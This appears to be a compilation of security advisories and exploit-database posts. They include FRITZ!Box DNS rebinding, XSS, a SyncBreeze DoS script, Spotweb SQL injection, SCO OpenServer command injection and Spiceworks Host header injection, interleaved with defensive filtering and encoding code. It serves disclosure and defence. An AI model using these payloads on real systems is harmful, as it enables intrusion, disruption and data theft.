      As shown, the DNS rebinding protection of FRITZ!Box routers can be bypassed, allowing for DNS rebinding attacks against connected devices. This type of attack however is only possible if vulnerable services are present in the local network which are reachable over HTTP without authentication. The web interface of FRITZ!Box routers, for example, is not vulnerable to this type of attack, since the HTTP Host header is checked for known domains. For this reason the risk is estimated to be low.

      Timeline
      ========
      2020-06-23 Vulnerability identified
      2020-07-08 Vendor notified
      2020-07-20 Vendor provided fixed version to RedTeam Pentesting
      2020-07-23 Vendor notified of another problematic IP
      2020-08-06 Vendor provided fixed version to RedTeam Pentesting
      2020-10-06 Vendor starts distribution of fixed version for selected devices
      2020-10-19 Advisory released

      RedTeam Pentesting GmbH
      =======================
      RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately.

      As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories.

      More information about RedTeam Pentesting can be found at:
      https://www.redteam-pentesting.de/

      Working at RedTeam Pentesting
      =============================
      RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit:
      https://www.redteam-pentesting.de/jobs/

      --
      RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
      Dennewartstr. 25-27                     Fax : +49 241 510081-99
      52068 Aachen                            https://www.redteam-pentesting.de
      Germany                                 Registergericht: Aachen HRB 14004
      Geschäftsführer: Patrick Hof, Jens Liebchen
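The advisory's point is that the filter only examined IPv4 A records inside the LAN prefix, so the same host reached the client as an IPv4-mapped IPv6 address, as 127.0.0.1 or as 0.0.0.0. The following is an added example, neither AVM's code nor part of RedTeam Pentesting's advisory, that models the described pre-7.21 behaviour and the check a rebinding filter actually needs, using Python's `ipaddress` module. The record list is constructed from the PoC's three zone entries plus a few made-up public and IPv6 answers; the LAN prefix is the advisory's default 192.168.178.0/24. It goes slightly beyond the advisory by also dropping link-local and other RFC 1918 ranges, which the same reasoning covers.

```python
import ipaddress

# The FRITZ!Box default range from the advisory.
LAN = ipaddress.ip_network("192.168.178.0/24")

# Constructed answers: the three PoC names, plus made-up public and IPv6 cases.
RECORDS = [
    ("A", "192.168.178.20"),            # private.example.com
    ("A", "127.0.0.1"),                 # local.example.com
    ("AAAA", "::ffff:192.168.178.20"),  # privateipv6.example.com
    ("A", "0.0.0.0"),                   # the "special address" the advisory mentions
    ("AAAA", "::1"),                    # IPv6 loopback (added case)
    ("A", "8.8.8.8"),                   # ordinary public answer (added case)
    ("AAAA", "2001:4860:4860::8888"),   # ordinary public IPv6 answer (added case)
]


def naive_filter(records):
    """The pre-7.21 behaviour as the advisory describes it:
    only A records inside the LAN prefix are suppressed."""
    return [(rtype, value) for rtype, value in records
            if not (rtype == "A" and ipaddress.ip_address(value) in LAN)]


def is_internal(text):
    """True for any answer that would let a browser reach the home network or the host itself."""
    addr = ipaddress.ip_address(text)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped          # ::ffff:192.168.178.20 -> 192.168.178.20
    return (addr in LAN or addr.is_loopback or addr.is_unspecified
            or addr.is_link_local or addr.is_private)


def hardened_filter(records):
    """Drop every record whose address is internal, whatever the record type."""
    return [(rtype, value) for rtype, value in records if not is_internal(value)]


if __name__ == "__main__":
    print("naive   :", naive_filter(RECORDS))
    print("hardened:", hardened_filter(RECORDS))
```

The order matters: unwrap the mapped IPv4 address first and only then apply the range checks, otherwise `::ffff:7f00:1` (127.0.0.1 in mapped hex form) passes a filter that only looks at the dotted-quad spelling.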
  17. # Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category" Stored XSS
      # Exploit Author: Kislay Kumar
      # Date: 2020-12-18
      # Vendor Homepage: https://xeroneit.net/
      # Software Link: https://xeroneit.net/portfolio/library-management-system-lms
      # Affected Version: Version 3.1
      # Tested on: Kali Linux

      Step 1. Log in to the application as Admin.
      Step 2. Select "Book" from the menu and click on "Book Category". Now click on the "Add" button.
      Step 3. Insert the payload "><img src onerror=alert(1)> in "Category Name" and save it.
      Step 4. Now you will see an alert box.
  18. # Exploit Title: SyncBreeze 10.0.28 - 'login' Denial of Service (PoC)
      # Date: 18-Dec-2020
      # Exploit Author: Ahmed Elkhressy
      # Vendor Homepage: http://www.syncbreeze.com
      # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
      # Version: 10.0.28
      # Tested on: Windows 7, Windows 10

      #!/usr/bin/python
      import socket

      host = "192.168.1.9"
      payload = 'A' * 1000   # oversized value appended to the Referer header

      request = ""
      request += "POST /login HTTP/1.1\r\n"
      request += "Host: " + host + "\r\n"
      request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\r\n"
      request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\n"
      request += "Accept-Language: en-US,en;q=0.5\r\n"
      request += "Accept-Encoding: gzip, deflate\r\n"
      request += "Content-Type: application/x-www-form-urlencoded\r\n"
      request += "Content-Length: 27\r\n"
      request += "Origin: http://" + host + "\r\n"
      request += "Connection: keep-alive\r\n"
      request += "Referer: http://" + host + "/login" + payload + "\r\n"
      request += "Upgrade-Insecure-Requests: 1\r\n"
      request += "\r\n"
      request += "username=test&password=test"

      s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      s.connect((host, 80))
      s.send(request.encode())   # .encode() keeps this working on Python 3 as well as 2
      print(s.recv(1024))
      s.close()
  19. # Exploit Title: Spotweb 1.4.9 - 'search' SQL Injection
      # Google Dork: N/A
      # Date: 20 December 2020
      # Exploit Author: BouSalman
      # Vendor Homepage: https://github.com/spotweb/spotweb
      # Software Link: N/A
      # Version: 1.4.9
      # Tested on: Ubuntu 18.04
      # CVE: CVE-2020-35545

      GET /?page=index&search[tree]=cat0_z0_c')+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))c)+AND+(' HTTP/1.1
      Host: 192.168.99.151
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Connection: close
  20. # Exploit Title: Academy-LMS 4.3 - Stored XSS
      # Date: 19/12/2020
      # Vendor page: https://academy-lms.com/
      # Version: 4.3
      # Tested on Win10 and Google Chrome
      # Exploit Author: Vinicius Alves
      # XSS Payload: </script><svg onload=alert();>

      1) Access the LMS and log in to the admin panel
      2) Access the courses page
      3) Open the course manager and the SEO menu
      4) Paste the XSS payload tag and submit
      5) Access the course page on the frontend
      6) Triggered!
  21. # Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS
      # Exploit Author: Kislay Kumar
      # Date: 2020-12-21
      # Google Dork: N/A
      # Vendor Homepage: http://codekernel.net/
      # Software Link: https://codecanyon.net/item/queue-management-system/22029961
      # Affected Version: Version 4.0.0
      # Patched Version: Unpatched
      # Category: Web Application
      # Tested on: Kali Linux

      Step 1. Log in as admin.
      Step 2. Select "Users" from the menu and click on "Add User".
      Step 3. Insert the payload "><svg/onload=alert(1)> in "First Name", "Last Name" and "Email".
      Step 4. Now open "User List" from the menu and you will get an alert box.
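Posts 3, 4, 6, 10, 13, 17, 20 and 21 above (and the reflected cases in posts 8 and 23) are one bug in three HTML contexts: `<script>alert(1)</script>` lands in a text node, `"><svg/onload=alert(1)>` closes an attribute value, and `</script><svg onload=alert();>` closes an inline script block. The following is an added example, not code from any of those applications, that renders the posts' own payloads through a concatenating template and through a context-aware one in Python, so that the difference is visible in the output. The template markup (a heading, an input field and an inline script variable) is invented for the demonstration.

```python
import html
import json

# The payloads quoted in the posts above.
TEXT_PAYLOAD = '<script>alert("r0b0tG4nG")</script>'   # First Name field, post 3
ATTR_PAYLOAD = '"><svg/onload=alert(1)>'                 # Add User fields, post 21
SCRIPT_PAYLOAD = '</script><svg onload=alert();>'        # SEO field, post 20

# Invented markup standing in for the applications' pages: one value per context.
TEMPLATE = (
    "<h1>Welcome %s</h1>\n"
    '<input type="text" name="first_name" value="%s">\n'
    "<script>var seoTitle = %s;</script>"
)


def render_unsafe(display_name, field_value, seo_title):
    """Plain concatenation: every value is interpreted as markup or script."""
    return TEMPLATE % (display_name, field_value, "'" + seo_title + "'")


def js_string_literal(value):
    """A JavaScript string literal that cannot terminate the enclosing <script> block.

    json.dumps() escapes quotes, backslashes and control characters but not '<',
    and the HTML parser ends a script block at '</script' before any JS runs.
    Escaping the angle brackets and '&' as \\uXXXX keeps them out of the HTML
    parser's view; JavaScript decodes them back inside the literal.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_safe(display_name, field_value, seo_title):
    """Encode each value for the context it is inserted into."""
    return TEMPLATE % (
        html.escape(display_name, quote=False),  # text node: < > & are enough
        html.escape(field_value, quote=True),    # attribute value: quotes as well
        js_string_literal(seo_title),            # inline script: a JS literal
    )


def executable_markup(fragment):
    """Count the injected constructs an HTML parser would act on in the fragment."""
    return (fragment.count("<script>alert")
            + fragment.count("<svg")
            + (fragment.count("</script>") - 1))  # one </script> belongs to the template


if __name__ == "__main__":
    print(render_unsafe(TEXT_PAYLOAD, ATTR_PAYLOAD, SCRIPT_PAYLOAD))
    print()
    print(render_safe(TEXT_PAYLOAD, ATTR_PAYLOAD, SCRIPT_PAYLOAD))
```

The attribute case is the one most often half-fixed: `html.escape()` with its default `quote=True` is required there, since a value that only has `<` and `>` encoded still closes a double-quoted attribute with the leading `"`. The `document.cookie` payload in post 6 is also a reminder that the session cookie should carry `HttpOnly`, which limits what a stored payload can read even before the encoding is fixed.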
  22. # Exploit Title: SCO Openserver 5.0.7 - 'outputform' Command Injection # Google Dork: inurl:/cgi-bin/manlist?section # Discovered Date: 04/09/2020 # Author: Ramikan # Vendor Homepage: https://www.xinuos.com/products/ # Software Link: https://www.sco.com/products/openserver507/-overview # Affected Version: Tested on 5.0.7, 6 can be affected on other versions. # Tested on: SCO Openserver 5.0.7 & version 6 # CVE : CVE-2020-25494 ************************************************************************************************************************************* Vulnerability :OS Command Injection ************************************************************************************************************************************* The outputform, toclevels parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability. It is also possible to cause the application to interact with an external domain, to verify that a command was executed. The payload |nslookup -q=cname mytest.com.& was submitted in the parameters. The application performed a DNS lookup for the specified domain name. Additionally, the payload |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 was submitted in the parameters. The application took 20960 milliseconds to respond to the request, compared with 1348 milliseconds for the original request. 
Affected URL: http://host:8457/cgi-bin/printbook
Affected Parameter: outputform, toclevels

*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
POST /cgi-bin/printbook HTTP/1.1
Host: 10.0.0.45:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.45:8457/en/Navpages/printmap.html
Content-Type: application/x-www-form-urlencoded
Content-Length: 118
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html&part=%2Fen%2FUSE_oview%2FCONTENTS.

*************************************************************************************************************************************
Response:
*************************************************************************************************************************************
HTTP/1.1 200 OK
Date: Tue, 04 Sep 2020 11:17:52 GMT
Server: Apache/1.3.33 (Unix) mod_perl/1.29
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 3188
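The defensive counterpart to the finding above is to validate every form parameter against an allow-list before it goes anywhere near a shell, and to spawn the formatter with an argument list rather than a command string. The following is an added example written for this page, not SCO's CGI code: the formatter name ("formatbook"), its flags and the set of accepted output formats are assumptions, while the sample request body is the one captured in the PoC request. It also shows the detection side: a cheap metacharacter check that a WAF rule or log review can apply to the parameter values.

```python
"""Input validation for a printbook-style CGI form handler.

Added example, not SCO's code. The formatter command name ("formatbook"),
its flags and the set of accepted output formats are assumptions; the
sample request body is the one captured in the advisory above.
"""
import re
import subprocess
from urllib.parse import parse_qs

ALLOWED_OUTPUTFORMS = {"ps", "pdf", "html"}          # assumed allow-list
PART_RE = re.compile(r"^/[A-Za-z0-9_./-]+$")          # document paths only
TOCLEVELS_RE = re.compile(r"^[0-9]{1,2}$")
# Characters that let a value break out of a shell argument; a value that
# carries any of them is worth an alert even before validation rejects it.
SHELL_META = re.compile(r"[|;&`$<>(){}\\\r\n'\"]")

CAPTURED_BODY = (  # request body from the advisory's PoC request
    "outputform=ps%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c%2021%20"
    "127.0.0.1%60%20%23'%20%7cping%20-n%2021%20127.0.0.1%7c%7c%60ping%20-c"
    "%2021%20127.0.0.1%60%20%23%5c%22%20%7cping%20-n%2021%20127.0.0.1"
    "&booktitle=test&toclevels=3&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html"
    "&part=%2Fen%2FUSE_oview%2FCONTENTS."
)


def suspicious_params(form: dict) -> list:
    """Names of parameters whose values contain shell metacharacters (for logging/alerting)."""
    return sorted(name for name, values in form.items()
                  if any(SHELL_META.search(v) for v in values))


def build_argv(form: dict) -> list:
    """Validate the parsed form and return an argv list for subprocess (no shell).

    Raises ValueError on anything outside the allow-lists, so an injected value
    is rejected before a process is spawned; and because the result is a list,
    even a value that slipped through would be one literal argument, never a
    second command.
    """
    outputform = form.get("outputform", [""])[0]
    if outputform not in ALLOWED_OUTPUTFORMS:
        raise ValueError(f"outputform not allowed: {outputform!r}")
    toclevels = form.get("toclevels", [""])[0]
    if not TOCLEVELS_RE.match(toclevels):
        raise ValueError(f"toclevels must be a small integer: {toclevels!r}")
    parts = form.get("part", [])
    bad = [p for p in parts if not PART_RE.match(p) or ".." in p]
    if bad or not parts:
        raise ValueError(f"invalid part paths: {bad!r}")
    title = form.get("booktitle", [""])[0][:200]   # free text, but only ever one argv element
    argv = ["formatbook", "--format", outputform, "--toclevels", toclevels, "--title", title]
    for p in parts:
        argv += ["--part", p]
    return argv


def handle_request(body: str) -> dict:
    """Parse a urlencoded body and decide whether the formatter may run."""
    form = parse_qs(body, keep_blank_values=True)
    flagged = suspicious_params(form)
    try:
        argv = build_argv(form)
    except ValueError as exc:
        return {"accepted": False, "suspicious": flagged, "reason": str(exc)}
    return {"accepted": True, "suspicious": flagged, "argv": argv}


def run_formatter(argv: list) -> bytes:
    """Spawn the (assumed) formatter with shell=False; only ever pass build_argv output."""
    return subprocess.run(argv, check=True, capture_output=True, timeout=60).stdout


if __name__ == "__main__":
    print(handle_request(CAPTURED_BODY))
    print(handle_request("outputform=ps&booktitle=test&toclevels=3"
                         "&part=%2Fen%2FOSR_FEATS%2FCONTENTS.html"))
```

The captured body is rejected twice over: `suspicious_params` flags `outputform` for the pipe and backtick characters, and `build_argv` refuses the value because it is not one of the accepted formats. The `suspicious` list is the piece to feed into logging, since a rejected request with metacharacters in a format field is a probe worth alerting on regardless of whether the handler was vulnerable.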
23. # Exploit Title: SCO Openserver 5.0.7 - 'section' Reflected XSS
# Google Dork: inurl:/cgi-bin/manlist?section
# Discovered Date: 14/06/2020
# Author: Ramikan
# Vendor Homepage: https://www.xinuos.com/products
# Software Link: https://www.sco.com/products/openserver507/-overview
# Affected Version: Tested on 5.0.7, 6 can be affected on other versions.
# Tested on: SCO Openserver 5.0.7 & version 6
# CVE : CVE-2020-25495

*************************************************************************************************************************************
Vulnerability: Reflected XSS & HTML Injection
*************************************************************************************************************************************

A reflected Cross-site scripting (XSS) vulnerability in Xinuos (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.

Affected URL: http://host:8457/cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script>
Affected Parameter: section

*************************************************************************************************************************************
POC
*************************************************************************************************************************************
Request:
*************************************************************************************************************************************
GET /cgi-bin/manlist?section="><h1>hello</h1><script>alert(123)</script> HTTP/1.1
Host: 192.168.20.48:8457
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
************************************************************************************************************************************* Response: ************************************************************************************************************************************* HTTP/1.1 200 OK Date: Thu, 03 Sep 2020 17:08:51 GMT Server: Apache/1.3.36 (Unix) mod_perl/1.29 Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 2680 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <head> <title>Manual section "><h1>hello</h1></P><script>alert(123)</script></title> <META HTTP-EQUIV='Content-Type' CONTENT='text/html;charset=ISO-8859-1'> <link rel="stylesheet" type="text/css" href="/styles/lin_moz.css" /> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> </head> <body bgcolor="#FFFFFF" topmargin="0" marginheight="0"> <!-- Begin DocView navigation toolbar --> <!--htdig_noindex--> <table class=dvtb width="100%" cellpadding=0 cellspacing=0 border=0 style="padding: 0;" > <tr valign=top class=dvtb> <td class=dvdb> <table class=dvtb cellpadding=3 cellspacing=1 border=0 bgcolor=#FFFFFF width=611 > <tr class=dvtb> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/index.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> DOC HOME </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/en/Navpages/sitemap.html" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SITE MAP </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/manform?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; 
background: #2059A6;"> MAN PAGES </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/infocat?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> GNU INFO </a></td> <td class=dvtb align=center style="background: #2059A6;"> <a href="/cgi-bin/search?lang=en" class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;"> SEARCH </a></td> </tr> </table> </td> <td class=dvtb align="left" width=100%> <table class=dvtb cellpadding="3" cellspacing="1" border="0" width="100%" bgcolor="#FFFFFF" > <tr class=dvtb valign="top"> <td class=dvtb style="background: #2059A6;" align=center width=100%> <a name=null class="dvtb" style="font-size: 10pt; font-family: verdana,helvetica,arial; font-weight: bold; color: #FFFFFF; background: #2059A6;" > &nbsp; </a> </td> </tr> </table> </td> </tr> </table> <!--/htdig_noindex--> <!-- End DocView navigation toolbar --> <h1>Manual section<h1>Manual section "><h1>hello</h1></P><script>alert(123)</script></h1><PRE> </PRE> </body></html>
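Both post 21 (stored XSS through the "Add User" fields) and post 23 (the 'section' value echoed into `<title>` and `<h1>`) have the same root cause: user-supplied text is written into an HTML response without encoding for the context it lands in. The following is an added example, not code from either vendor; the page layouts are assumed, and the two payloads and the vulnerable response fragment are the ones quoted in the advisories. It renders the same two pages with context-aware encoding and includes a small detection helper that flags tags in a response the template never emitted.

```python
"""Context-aware output encoding for the reflection points in posts 21 and 23.

Added example, not the vendors' code. The page layouts are assumed; the
payloads and the vulnerable response fragment are quoted from the advisories.
"""
import html
import re
from urllib.parse import quote

# From the advisories: the 'section' payload (post 23) and the user-field payload (post 21).
SECTION_PAYLOAD = '"><h1>hello</h1><script>alert(123)</script>'
USER_PAYLOAD = '"><svg/onload=alert(1)>'
# Fragment of the vulnerable manlist response quoted in post 23.
VULN_RESPONSE_FRAGMENT = ('<h1>Manual section<h1>Manual section "><h1>hello</h1></P>'
                          '<script>alert(123)</script></h1>')

# Tags each template is allowed to emit; anything else in the output is injected markup.
MANLIST_TAGS = {"html", "head", "title", "body", "h1", "a"}
USER_LIST_TAGS = {"table", "tr", "td", "a"}


def esc(value: str) -> str:
    """HTML text and attribute context: & < > " ' become entities, so a value can
    neither close the enclosing tag nor break out of a quoted attribute."""
    return html.escape(value, quote=True)


def render_manual_section(section: str) -> str:
    """Manual-section page (assumed layout) with 'section' encoded per context:
    text node, and percent-encoded inside a URL that is then attribute-encoded."""
    link = "/cgi-bin/manlist?section=" + quote(section, safe="")   # URL context first
    return (
        "<html><head><title>Manual section " + esc(section) + "</title></head>"
        "<body><h1>Manual section " + esc(section) + "</h1>"
        '<a href="' + esc(link) + '">permalink</a></body></html>'
    )


def render_user_list(users) -> str:
    """User list (assumed layout). Escaping at render time, not at storage time, is
    what makes stored XSS harmless: the database may hold the raw string."""
    rows = "".join(
        "<tr><td>" + esc(u["first"]) + "</td><td>" + esc(u["last"]) + "</td>"
        '<td><a href="mailto:' + esc(u["email"]) + '">' + esc(u["email"]) + "</a></td></tr>"
        for u in users
    )
    return "<table>" + rows + "</table>"


def has_unescaped_tag(rendered: str, allowed_tags) -> bool:
    """Detection helper for response scanning: True if the output contains a tag
    the template itself does not emit. Entity-encoded text never matches, because
    the pattern requires a literal '<'."""
    found = {t.lower() for t in re.findall(r"</?([A-Za-z][A-Za-z0-9]*)", rendered)}
    return not found <= set(allowed_tags)


if __name__ == "__main__":
    print(render_manual_section(SECTION_PAYLOAD))
    print(render_user_list([{"first": USER_PAYLOAD, "last": "Doe", "email": USER_PAYLOAD}]))
    print(has_unescaped_tag(VULN_RESPONSE_FRAGMENT, MANLIST_TAGS))
```

Run against the quoted response fragment, `has_unescaped_tag` reports the injected `<script>` and `</P>`; run against the encoded rendering of the same payload it reports nothing, because every `<` from the parameter has become `&lt;`. The email field should additionally be validated on input (a mail address never legitimately contains `<`), but output encoding is the control that holds even when input validation is bypassed.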
24. # Exploit Title: Spiceworks 7.5 - HTTP Header Injection
# Google Dork: inurl:/pro_users/login
# Discovered Date: 15/09/2020
# Exploit Author: Ramikan
# Vendor Homepage: https://www.spiceworks.com
# Affected Version: 7.5.7.0 may be others.
# Tested On Version: 7.5.7.0
# CVE : CVE-2020-25901

Vulnerability: Host Header Injection

Description: Host Header Injection vulnerability may allow an attacker to spoof a particular Host header, allowing the attacker to render arbitrary links that point to a malicious website with poisoned Host header webpages. An issue was discovered in Spiceworks version 7.5.7.0 (may be affected on other versions too). The values of the 'Host' headers are implicitly set as trusted while this should be forbidden, leading to potential host header injection attack, and also the affected hosts can be used for domain fronting. This means affected hosts can be used by attackers to hide behind during various other attacks.

Request:
GET / HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1

Response:
HTTP/1.1 302 Found
Date: Tue, 15 Sep 2020 12:46:52 GMT
Cache-Control: no-cache
X-Runtime: 0
Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly
Location: http://google.com/pro_users/login
Content-Length: 99
Connection: close
Content-Type: text/html; charset=utf-8

<html><body>You are being <a href="http://google.com/pro_users/login">redirected</a>.</body></html>

Request 2:
GET /pro_users/login HTTP/1.1
Host: google.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; compatibility_test=testing; _gk=%7B%22t%22%3A%7B%7D%2C%22p%22%3A%7B%22cg_allow_st%22%3A%22%5B%5D%22%2C%22uuid%22%3A%22b7f707b6-f574-44bb-a766-986fc5851a03%22%7D%2C%22ab%22%3A%7B%7D%7D; opt_out=zdc; euconsent=BO3ulHHO3ulQVASABAENDWAAAAAyOAAA; _evidon_suppress_notification_cookie={"date":"\"2020-09-15T12:20:47Z\""}
Upgrade-Insecure-Requests: 1

Response 2 ("Forgot your password" link replaced with the domain from the header):
HTTP/1.1 200 OK Date: Tue, 15 Sep 2020 12:48:26 GMT Cache-Control: private, max-age=0, must-revalidate X-UA-Compatible: IE=edge,chrome=1 X-Runtime: 0 ETag: "77c8f98180ec3f6d4f2fcc8dcd796462" Set-Cookie: compatibility_test=testing; path=/ Set-Cookie: spiceworks_session=BAh7CjoPc2Vzc2lvbl9pZEkiJTU4NDg1MzhlMTAzNGEyMGNlZTRiYzI4YmZlNGVlNDljBjoGRUY6DnJldHVybl90byIGLzoQX2NzcmZfdG9rZW5JIjFyK3NZd3F4ZHpPSkFWNlhTb1ZhWVE0SE9iZzV1VGZIRmp0dURnM1ptSDlrPQY7BkZJIgpmbGFzaAY7BlRJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoedXNlcl9pbnZpdGF0aW9uLnJldHVybl90byISL3dpemFyZC9zdGFydA%3D%3D--d7fabb212c9a1e683b384a24728f72fdaeffbc78; path=/; HttpOnly Content-Length: 9875 Connection: close Content-Type: text/html; charset=utf-8 <!DOCTYPE html> <html lang="en" class="no-js desktop"> <head> <meta charset="utf-8" /> <title>Spiceworks</title> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="author" content="Spiceworks, Inc." /> <meta name="description" content="Network management made simple" /> <meta name="version" content="unknown" /> <noscript> <meta http-equiv="refresh" content="2;url=/sessions/incompatible" /> </noscript> <link href="/assets/sui.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/base.css?7500070" media="all" rel="stylesheet" type="text/css" /> <link href="/assets/application.css?7500070" media="all" rel="stylesheet" type="text/css" /> <!--[if IE]><link href="/stylesheets/hacks.ie.css?7500070" media="all" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 7]><link href="/stylesheets/hacks.ie7.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <!--[if IE 8]><link href="/stylesheets/hacks.ie8.css?7500070" media="screen" rel="stylesheet" type="text/css" /><![endif]--> <link href="/stylesheets/print.css?7500070" media="print" rel="stylesheet" 